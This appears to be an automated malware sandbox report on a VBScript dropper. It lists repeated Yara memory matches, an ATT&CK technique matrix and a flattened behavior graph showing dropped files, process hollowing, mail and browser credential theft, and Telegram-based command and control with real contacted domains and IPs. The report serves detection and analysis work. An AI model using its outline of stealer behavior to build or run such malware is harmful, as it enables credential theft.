          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information121
          Scripting
          1
          Valid Accounts
          1
          Native API
          121
          Scripting
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules
          1
          DLL Side-Loading
          1
          Valid Accounts
          11
          Deobfuscate/Decode Files or Information
          LSASS Memory2
          File and Directory Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution
          1
          Valid Accounts
          1
          Access Token Manipulation
          4
          Obfuscated Files or Information
          Security Account Manager26
          System Information Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          311
          Process Injection
          4
          Software Packing
          NTDS1
          Query Registry
          Distributed Component Object ModelInput Capture1
          Non-Standard Port
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder
          1
          Timestomp
          LSA Secrets341
          Security Software Discovery
          SSHKeylogging3
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials41
          Virtualization/Sandbox Evasion
          VNCGUI Input Capture24
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          File Deletion
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
          Masquerading
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Valid Accounts
          /etc/passwd and /etc/shadow1
          System Network Configuration Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Access Token Manipulation
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
          Virtualization/Sandbox Evasion
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
          Process Injection
          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618356 Sample: Draft doc PI ITS15235.vbs Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 55 reallyfreegeoip.org 2->55 57 api.telegram.org 2->57 59 3 other IPs or domains 2->59 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 93 17 other signatures 2->93 9 wscript.exe 2 2->9         started        13 Naisrtpf.PIF 2->13         started        15 Naisrtpf.PIF 2->15         started        signatures3 89 Tries to detect the country of the analysis system (by using the IP) 55->89 91 Uses the Telegram API (likely for C&C communication) 57->91 process4 file5 53 C:\Users\user\AppData\Local\Temp\x.exe, PE32 9->53 dropped 95 Benign windows process drops PE files 9->95 97 VBScript performs obfuscated calls to suspicious functions 9->97 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->99 17 x.exe 1 8 9->17         started        101 Antivirus detection for dropped file 13->101 103 Multi AV Scanner detection for dropped file 13->103 105 Writes to foreign memory regions 13->105 21 fptrsiaN.pif 13->21         started        107 Allocates memory in foreign processes 15->107 109 Sample uses process hollowing technique 15->109 111 Allocates many large memory junks 15->111 23 fptrsiaN.pif 15->23         started        signatures6 process7 file8 43 C:\Windows \SysWOW64\svchost.pif, PE32+ 17->43 dropped 45 C:\Windows \SysWOW6445ETUTILS.dll, PE32+ 17->45 dropped 47 C:\Users\Public\Libraries\fptrsiaN.pif, PE32 17->47 dropped 49 2 other malicious files 17->49 dropped 67 Antivirus detection for dropped file 17->67 69 Multi AV Scanner detection for dropped file 17->69 71 Drops PE files with a suspicious file extension 17->71 77 5 other signatures 17->77 25 fptrsiaN.pif 15 2 17->25         started        29 cmd.exe 1 17->29         started        31 cmd.exe 3 17->31         started        73 Tries to steal Mail credentials (via file / registry access) 23->73 75 Tries to harvest and steal browser information (history, passwords, etc) 23->75 signatures9 process10 dnsIp11 61 mail.irco.com.sa 46.151.208.21, 49773, 49790, 49793 NASHIRNET-ASNNASHIRNETASNSA Saudi Arabia 25->61 63 checkip.dyndns.com 132.226.8.169, 49731, 49734, 49736 UTMEMUS United States 25->63 65 2 other IPs or domains 25->65 113 Detected unpacking (changes PE section rights) 25->113 115 Detected unpacking (overwrites its own PE header) 25->115 117 Tries to steal Mail credentials (via file / registry access) 25->117 33 extrac32.exe 1 29->33         started        37 conhost.exe 29->37         started        39 ndpha.pif 29->39         started        41 conhost.exe 31->41         started        signatures12 process13 file14 51 C:\Users\Public\ndpha.pif, PE32 33->51 dropped 79 Drops PE files to the user root directory 33->79 81 Drops PE files with a suspicious file extension 33->81 signatures15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.